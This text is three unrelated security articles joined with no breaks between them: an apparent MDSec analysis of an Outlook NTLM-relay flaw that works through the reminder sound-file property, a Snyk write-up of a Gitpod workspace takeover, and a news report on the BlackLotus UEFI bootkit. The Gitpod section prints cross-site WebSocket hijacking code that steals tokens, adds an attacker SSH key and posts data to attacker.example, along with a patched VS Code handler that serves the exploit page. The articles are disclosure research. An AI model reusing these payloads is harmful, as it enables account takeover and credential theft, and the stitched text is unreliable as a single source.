Today saw Microsoft patch an interesting vulnerability in Microsoft Outlook. The vulnerability is described as follows:
Microsoft Office Outlook contains a privilege escalation vulnerability that allows for a NTLM Relay attack against another service to authenticate as the user.
However, no specific details were provided on how to exploit the vulnerability.
At MDSec, we’re continually looking to weaponise both private and public vulnerabilities to assist us during our red team operations. Having recently given a talk on leveraging NTLM relaying during red team engagements at FiestaCon, this vulnerability particularly stood out to me and warranted further analysis.
While no exploitation details were provided, Microsoft did release a script to audit your Exchange server for mail items that may have been used to exploit the issue.
Review of the audit script reveals that it specifically looks for the PidLidReminderFileParameter property inside mail items and offers the option to “clean” it if found:
Diving in to what this property is, we find the following definition:
This property controls the filename of the sound the Outlook client should play when the reminder for the mail item is triggered. This is of course particularly interesting, as it implies the property accepts a filename, which could potentially be a UNC path used to trigger NTLM authentication.
Following further analysis of the available properties, we also note the PidLidReminderOverride property which is described as follows:
With this in mind, we likely also need to set the PidLidReminderOverride property so that Outlook will parse our malicious UNC path inside PidLidReminderFileParameter.
Let’s begin to build an exploit…
The first step to exploit this issue is to create an Outlook MSG file; these files are compound files in CFB format. To speed up the generation of these files, I leveraged the .NET MsgKit library.
Reviewing the MsgKit library, we find that the Appointment class defines a number of properties to add to the mail item before the MSG file is saved:
To create our malicious calendar appointment, I extended the Appointment class to add our required PidLidReminderOverride and PidLidReminderFileParameter properties, as shown above.
From that point, we simply need to create a new appointment and save it, before sending to our victim:
This vulnerability is particularly interesting as it will trigger NTLM authentication to an IP address (i.e. a system outside of the Trusted Intranet Zone or Trusted Sites), and this occurs immediately on opening the e-mail, irrespective of whether the user has selected the option to load remote images.
This one is worth patching as a priority, as it’s incredibly easy to exploit and will no doubt be adopted by adversaries quickly.
Here’s a demonstration of our exploit which will relay the incoming request to LDAP to obtain a shadow credential:
This article walks us through a current Snyk Security Labs research project focusing on cloud-based development environments (CDEs) — which resulted in a full workspace takeover on the Gitpod platform and extended to the user’s SCM account. The issues described here were responsibly disclosed to Gitpod and resolved within a single working day!
Cloud development environments and Gitpod
As more and more companies begin to leverage cloud-based development environments for benefits such as improved performance, developer experience, consistent development environments, and low setup times, we couldn’t help but wonder about the security implications of adopting these cloud-based IDEs.
First, let’s provide a brief overview of how CDEs operate so we can understand the difference between cloud-based and traditional, local-workstation based development — and how it changes the developer security landscape.
In contrast to traditional development, CDEs run on a cloud hosted machine with an IDE backend. This typically provides a web application version of the IDE and support for integrating with a locally installed IDE over SSH, giving users a seamless and familiar experience. When using a CDE, the organization’s code and any supporting services, such as a development database, are hosted within the cloud. Check out the following diagram for a visual representation of information flow in a CDE.
The security risks of locally installed development environments are not new. However, they historically haven’t received much attention from developers. In May 2021, Snyk disclosed vulnerable VS Code extensions that led to a 1-click data leak or arbitrary command execution. These traditional workstation-based development environments, such as a local instance of VS Code or IntelliJ, carry other information security concerns — including hardware failure, data security, and malware. While these concerns can be addressed by employing Full Disk Encryption, version control, backups, and anti-malware systems, many questions remain unanswered with the adoption of cloud-based development environments:
What happens if a cloud IDE workspace is infected with malware?
What happens when access controls are insufficient and allow cross-user or even cross-organization access to workspaces?
What happens when a rogue developer exfiltrates company intellectual property from a cloud-hosted machine outside the visibility of the organization’s data loss prevention or endpoint security software?
In our current security research project here at Snyk, we examine the security implications of adopting cloud-based IDEs. In this article, we present a case study of one of the vulnerabilities discovered during our initial exploration of the Gitpod platform.
Examining the Gitpod platform
Disclaimer: When it came to looking at cloud IDE solutions for our research, we settled on either self-hosted or cloud-based solutions, where the vendor has a clearly defined security policy providing safe harbor for researchers.
One of the most popular CDEs is Gitpod. Its wide adoption and extended feature set — including automated backups, Git integration out of the box, and multiple IDE backends — ensured that Gitpod was among the first products we looked into.
The first stage of our research involved becoming familiar with the basic workflows of Gitpod, setting up an organization, and experimenting with the product while capturing traffic using Burp Suite to observe the various APIs and transactions. We then pulled the Gitpod source code from GitHub to study the inner workings of its APIs, and reviewed any relevant architecture documentation to better understand each of the components and their function. A great resource for this was a video that provided an initial deep dive into the architecture of Gitpod. At a high level, Gitpod leverages multiple microservices deployed in a Kubernetes environment, where each user workspace is deployed to a dedicated ephemeral pod.
Gitpod’s primary set of external components are concerned with the dashboard, authentication, and the creation and management of workspaces, organizations, and accounts. At its core, the main component here is aptly named server, a TypeScript application that exposes a JSONRPC API over WebSocket that is consumed by a React frontend called dashboard.
From the dashboard, it’s easy to integrate with an SCM provider, such as GitHub or Bitbucket, to import a repository and spin up a development environment — which then serves the source code and provides a working Git environment. Once the workspace is provisioned, it is made accessible via SSH and HTTPS on a subdomain of gitpod.io (i.e. https://[WORKSPACE_NAME].[CLUSTER_NAME].gitpod.io) through a Golang-based component called ws-proxy.
The security vulnerability that was discovered through our research relates primarily to the server component and the JSONRPC served over a WebSocket connection, which ultimately led to a workspace takeover in Gitpod.
Technical details
WebSockets and Same Origin Policy
WebSocket is a technology that allows for real-time, two-way communication between a client (typically a web browser) and a server. It enables a persistent connection between the client and server, allowing for continuous “real-time” data transfer without the need for repeated HTTP requests.
An interesting aspect of WebSockets from a security perspective is that the Same Origin Policy (SOP), a core browser security mechanism, does not apply. SOP is the control that prevents a website from issuing an AJAX request to another website and reading the response. If this were possible, it would present a security concern because browsers typically submit cookies along with every request (even for cross-origin requests, as in CSRF-style attacks). Without SOP, any website would be able to issue requests to foreign websites and obtain your data from other domains.
This leads us to the vulnerability class known as Cross-Site WebSocket Hijacking. The attack is similar to a combination of Cross-Site Request Forgery and a CORS misconfiguration: when a WebSocket handshake relies solely upon HTTP cookies for authentication, a malicious website can instantiate a new WebSocket connection to the vulnerable application, allowing an attacker to both send and receive data through that connection.
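To make the attack concrete, a minimal hijacking page might look something like the sketch below. This illustrates the class rather than anything Gitpod-specific; the endpoint, method name, and collector URL are placeholders.

```ts
// Minimal cross-site WebSocket hijacking sketch (illustrative only).
// Because the browser attaches the victim's cookies to the handshake, the
// attacker's page can both send and receive data as the victim.
const ws = new WebSocket("wss://vulnerable.example/api"); // cookie-authenticated handshake

ws.onopen = () => {
  // Invoke an authenticated API method on behalf of the victim.
  ws.send(JSON.stringify({ id: 1, method: "whoami", params: [] }));
};

ws.onmessage = (event) => {
  // Read the response cross-origin and exfiltrate it (hypothetical collector URL).
  fetch("https://attacker.example/log", { method: "POST", body: event.data });
};
```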
When reviewing an application with WebSocket connections, it’s always worth examining this in depth. Let’s take a look at the WebSocket request for the Gitpod server.
Under normal circumstances, the connection is successfully upgraded to a WebSocket and communication begins. No additional authentication takes place within the WebSocket exchange itself, and the JSONRPC API can be invoked over the connection.
So far, we’ve found no additional authentication taking place within the established channel — a good sign for any potential attackers. Now, let’s verify that no additional Origin checks are taking place by taking a handshake we have observed and tampering with the Origin header.
This looks promising! It seems that the domain evil.com is able to issue Cross-Origin WebSocket requests to gitpod.io. However, another security mechanism introduces a challenge.
SameSite Cookie bypass
SameSite cookies are a fairly recent addition, providing partial mitigation against Cross-Site Request Forgery (CSRF) attacks. While not every site has adopted them, most popular browsers now treat any cookie that does not explicitly set a SameSite attribute as SameSite=Lax by default. So, while the underlying vulnerability is present, without a bypass for SameSite cookies our attack would be largely theoretical and only work against a subset of outdated and niche browsers.
So what is a site in the context of SameSite? Simply put, the site corresponds to the combination of the scheme and the registrable domain (if any) of the origin’s host. If we look at the specification for SameSite, we can see that subdomains are not considered. This is more relaxed than the definition of an origin used by the Same Origin Policy, which comprises a scheme + host (including subdomains) + port (e.g. https://security.snyk.io:8443).
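To make the distinction concrete, the following sketch compares the two notions for hosts like the ones discussed here. The registrable-domain check is a naive approximation for these examples; real browsers consult the Public Suffix List.

```ts
// "Origin" = scheme + host + port; "site" = scheme + registrable domain.
const origin = (u: URL) => u.origin;
const site = (u: URL) =>
  `${u.protocol}//${u.hostname.split(".").slice(-2).join(".")}`; // naive eTLD+1 for these examples

const workspace = new URL("https://myworkspace.cluster1.gitpod.io"); // illustrative hostname
const dashboard = new URL("https://gitpod.io");

console.log(origin(workspace) === origin(dashboard)); // false: different origins
console.log(site(workspace) === site(dashboard));     // true: same site, so Lax cookies
                                                       // are still attached to the request
```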
Earlier, we observed that the workspace was exposed via a subdomain of gitpod.io. In the context of SameSite, the workspace URL is therefore considered to be the same site as gitpod.io. So, it should be possible for one workspace to issue a cross-domain, same-site request to a *.gitpod.io domain with the original user’s cookies attached. Let’s see if we can leverage an attacker-controlled workspace to serve a WebSocket Hijacking payload.
To first verify that the cookies are indeed transmitted and the WebSocket communication is successfully achieved, let’s open the browser console from a workspace and attempt to initiate a WebSocket connection.
As we can see in the above screenshot, we attempt to open a new WebSocket connection and, once open, submit a JSONRPC request. The console output shows that a message has been received containing the result of our request, confirming that the cookies are submitted and the origin is permitted to open a WebSocket to gitpod.io.
We now need a way to serve JavaScript from the workspace that can be accessed by a Gitpod user. Looking through the available features, it is possible to expose ports in the workspace and make them accessible using a command-line utility called gitpod-cli, available on the path inside the workspace as gp. We can invoke gp ports expose 8080, and then set up a basic Python web server using python -m http.server 8080. This in turn creates a new subdomain where the exposed port can be accessed, as shown below.
However, the connection failed. This was somewhat concerning and required more investigation, so we opened the source code and started looking for the cause. We found the following regular expression pattern, which appears to be used to extract the workspace name from the URL.
The way this matching is performed results in the wrong workspace name being extracted, as demonstrated in the following screenshot:
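As a hypothetical illustration of this failure mode (this is not Gitpod’s actual pattern, and the hostnames are made up), a parser that treats the entire first DNS label as the workspace name goes wrong as soon as a port prefix is present:

```ts
// Hypothetical sketch of the failure mode, NOT Gitpod's actual pattern:
// assume the workspace name is the full first DNS label of the host.
function workspaceFromHost(host: string): string | undefined {
  const match = /^([a-z0-9][a-z0-9-]*)\./.exec(host);
  return match?.[1];
}

// Plain workspace URL: the workspace name is extracted as expected.
workspaceFromHost("mycompany-myrepo-abc123.ws-eu45.gitpod.io");
// -> "mycompany-myrepo-abc123"

// Port-exposed URL: the port prefix ends up in the extracted name, so any
// lookup or origin validation based on it fails and the connection is refused.
workspaceFromHost("8080-mycompany-myrepo-abc123.ws-eu45.gitpod.io");
// -> "8080-mycompany-myrepo-abc123"
```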
So, it looks like we can’t serve our content from an exposed port inside the Gitpod hosted workspace and we need another way. By now we already know that we have privileged access to a machine that’s running the VS Code service and is serving requests issued to our workspace URL — so can we abuse this in some way?
The initial idea was to terminate the vscode process and start a Python web server to serve an HTML file. Unfortunately, this did not work and resulted in the workspace being restarted, which appeared to be performed by a local service called supervisor. While testing this approach, we noticed that if we terminated the process without binding another process to the VS Code port, the supervisor service would automatically restart the vscode process, resulting in a brief hang of the UI without a full restart of the workspace.
This sparked a promising idea: could we patch VS Code to serve a built-in exploit for us?
Patching VS Code was relatively easy. By comparing the original VS Code server source code to the distributed version, we quickly found a convenient location to serve the exploit.
VS Code contains an API endpoint at /version, which returns the commit of the current version:
We modified it so that the correct Content-Type of text/html and the contents of an HTML file were returned. Now, we terminated the vscode process, allowing our newly introduced changes to load into a newly spawned VS Code process instance:
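A simplified sketch of the kind of change involved is shown below. This is not the actual VS Code server code; the handler shape and the payload path are assumptions.

```ts
// Simplified sketch of the idea, not the actual VS Code server source.
import { readFileSync } from "fs";
import type { ServerResponse } from "http";

function handleVersion(res: ServerResponse): void {
  // Original behaviour (roughly): return the commit identifier as plain text.
  // res.writeHead(200, { "Content-Type": "text/plain" });
  // res.end(commit);

  // Patched behaviour: return an attacker-controlled HTML page instead.
  res.writeHead(200, { "Content-Type": "text/html" });
  res.end(readFileSync("/workspace/exploit.html", "utf8")); // assumed payload path
}
```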
Finally, we can leverage the JSONRPC methods getLoggedInUser, getGitpodTokens, getOwnerToken, and addSSHPublicKey to build a payload that grants us full control over the user’s workspaces when an unsuspecting Gitpod user visits our link!
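A hedged sketch of what such a payload might look like follows. The method names are those listed above, but the endpoint path, JSON-RPC framing, and parameter shapes are assumptions for illustration.

```ts
// Sketch of the browser-side payload served from the patched /version page.
const ws = new WebSocket("wss://gitpod.io/api/v1"); // assumed API endpoint path

let id = 0;
const call = (method: string, ...params: unknown[]) =>
  ws.send(JSON.stringify({ jsonrpc: "2.0", id: ++id, method, params }));

ws.onopen = () => {
  call("getLoggedInUser");  // identify the victim account
  call("getGitpodTokens");  // enumerate tokens associated with the account
  // getOwnerToken(workspaceId) could then be called for each workspace of interest.
  // Persist access by registering an attacker-controlled SSH key (parameter shape assumed).
  call("addSSHPublicKey", { name: "attacker", key: "ssh-ed25519 AAAA... attacker" });
};

ws.onmessage = (event) => {
  // Ship every response to an attacker-controlled collector (hypothetical URL).
  fetch("https://attacker.example/collect", { method: "POST", body: event.data });
};
```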
Here it is in action:
We can see that we’ve been able to extract some sensitive information about the user account, and are notified that our SSH key has been added to the account. Let’s see if we can SSH to the workspace:
Mission successful! As shown above, we have full access to the user’s workspaces after they’ve visited a link we sent them!
Timeline
Mon, Feb. 13, 2023 — Vulnerability disclosed to vendor
In this post, we presented the first findings from our current research into Cloud Development Environments (CDEs) — which allowed a full account takeover through visiting a link, exploiting a commonly misunderstood vulnerability (WebSocket Hijacking), and leveraging a practical SameSite cookie bypass. As cloud developer workspaces are becoming increasingly popular, it’s important to consider the additional risks that are introduced.
We would like to praise Gitpod for their fantastic turnaround on addressing this security vulnerability, and look forward to presenting more of our findings on cloud-based remote development solutions in the near future.
A stealthy Unified Extensible Firmware Interface (UEFI) bootkit called BlackLotus has become the first publicly known malware capable of bypassing Secure Boot defenses, making it a potent threat in the cyber landscape.
“This bootkit can run even on fully up-to-date Windows 11 systems with UEFI Secure Boot enabled,” Slovak cybersecurity company ESET said in a report shared with The Hacker News.
UEFI bootkits are deployed in the system firmware and allow full control over the operating system (OS) boot process, thereby making it possible to disable OS-level security mechanisms and deploy arbitrary payloads during startup with high privileges.
Offered for sale at $5,000 (and $200 per new subsequent version), the powerful and persistent toolkit is programmed in Assembly and C and is 80 kilobytes in size. It also features geofencing capabilities to avoid infecting computers in Armenia, Belarus, Kazakhstan, Moldova, Romania, Russia, and Ukraine.
Details about BlackLotus first emerged in October 2022, with Kaspersky security researcher Sergey Lozhkin describing it as a sophisticated crimeware solution.
“This represents a bit of a ‘leap’ forward, in terms of ease of use, scalability, accessibility, and most importantly, the potential for much more impact in the forms of persistence, evasion, and/or destruction,” Eclypsium’s Scott Scheferman noted.
BlackLotus, in a nutshell, exploits a security flaw tracked as CVE-2022-21894 (aka Baton Drop) to get around UEFI Secure Boot protections and set up persistence. The vulnerability was addressed by Microsoft as part of its January 2022 Patch Tuesday update.
Successful exploitation of the vulnerability, according to ESET, allows arbitrary code execution during early boot phases, permitting a threat actor to carry out malicious actions on a system with UEFI Secure Boot enabled without having physical access to it.
“This is the first publicly known, in-the-wild abuse of this vulnerability,” ESET researcher Martin Smolár said. “Its exploitation is still possible as the affected, validly signed binaries have still not been added to the UEFI revocation list.”
“BlackLotus takes advantage of this, bringing its own copies of legitimate – but vulnerable – binaries to the system in order to exploit the vulnerability,” effectively paving the way for Bring Your Own Vulnerable Driver (BYOVD) attacks.
Besides being equipped to turn off security mechanisms like BitLocker, Hypervisor-protected Code Integrity (HVCI), and Windows Defender, it’s also engineered to drop a kernel driver and an HTTP downloader that communicates with a command-and-control (C2) server to retrieve additional user-mode or kernel-mode malware.
The exact modus operandi used to deploy the bootkit is unknown as yet, but it starts with an installer component that’s responsible for writing the files to the EFI system partition, disabling HVCI and BitLocker, and then rebooting the host.
The restart is followed by the weaponization of CVE-2022-21894 to achieve persistence and install the bootkit, after which it is automatically executed on every system start to deploy the kernel driver.
While the driver is tasked with launching the user-mode HTTP downloader and running next-stage kernel-mode payloads, the latter is capable of executing commands received from the C2 server over HTTPS.
This includes downloading and executing a kernel driver, DLL, or regular executable; fetching bootkit updates; and even uninstalling the bootkit from the infected system.
“Many critical vulnerabilities affecting security of UEFI systems have been discovered in the last few years,” Smolár said. “Unfortunately, due to the complexity of the whole UEFI ecosystem and related supply-chain problems, many of these vulnerabilities have left many systems vulnerable even a long time after the vulnerabilities have been fixed – or at least after we were told they were fixed.”
“It was just a matter of time before someone would take advantage of these failures and create a UEFI bootkit capable of operating on systems with UEFI Secure Boot enabled.”